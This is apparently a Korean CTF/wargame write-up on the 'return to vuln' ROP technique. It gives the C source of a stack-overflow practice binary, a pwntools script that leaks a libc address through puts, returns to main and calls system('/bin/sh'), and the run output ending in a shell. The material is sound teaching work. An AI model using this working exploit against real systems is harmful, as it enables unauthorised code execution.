Return to vuln 기법은 ROP 코드를 실행한 후 취약성이 있는 코드로 다시 돌아오는 기법을 말합니다. 이 기법을 사용하면 Got Overwrite를 하지 않아도 되서 Full RELRO가 걸려있어도 익스플로잇이 가능합니다.
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
int main(int argc, char *argv[]) {
char buf[0x40] = {};
initialize();
read(0, buf, 0x400);
write(1, buf, sizeof(buf));
return 0;
}
1. libc base Leak
1-1. system 함수 실제 주소 얻기
1-2. "/bin/sh" 실제 주소 얻기
2. Return to vuln
3. system("/bin/sh")
from pwn import *
def slog(name, addr):
return success(": ".join([name, hex(addr)]))
p = process("./basic_rop_x64")
e = ELF("./basic_rop_x64", checksec=False)
libc = e.libc
r = ROP(e)
#context.log_level = 'debug'
puts_plt = e.plt['puts']
read_got = e.got['read']
read_offset = libc.symbols['read']
system_offset = libc.symbols['system']
binsh_offset = list(libc.search(b"/bin/sh"))[0]
main = e.symbols['main']
ret = r.find_gadget(['ret'])[0]
pop_rdi = r.find_gadget(['pop rdi', 'ret'])[0]
payload = b'A' * 72
# puts(read@got)
payload += p64(pop_rdi) + p64(read_got)
payload += p64(puts_plt)
# return to vuln
payload += p64(main)
p.send(payload)
p.recvuntil(b'A' * 64)
read = u64(p.recvn(6)+b'\x00'*2)
lb = read - read_offset
system = lb + system_offset
binsh = lb + binsh_offset
slog("read", read)
slog("libc base", lb)
slog("system", system)
slog("/bin/sh", binsh)
payload = b'A' * 72
# system("/bin/sh")
payload += p64(ret)
payload += p64(pop_rdi) + p64(binsh)
payload += p64(system)
p.send(payload)
p.recvuntil(b'A' * 64)
p.interactive()
$ python3 rtv.py
[+] Starting local process './basic_rop_x64': pid 455
[*] '/home/ion/wargame/basic_rop_x64/basic_rop_x64'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/lib/x86_64-linux-gnu/libc-2.27.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded 14 cached gadgets for './basic_rop_x64'
[+] read: 0x7fec739dd020
[+] libc base: 0x7fec738cd000
[+] system: 0x7fec7391c420
[+] /bin/sh: 0x7fec73a80d88
[*] Switching to interactive mode
$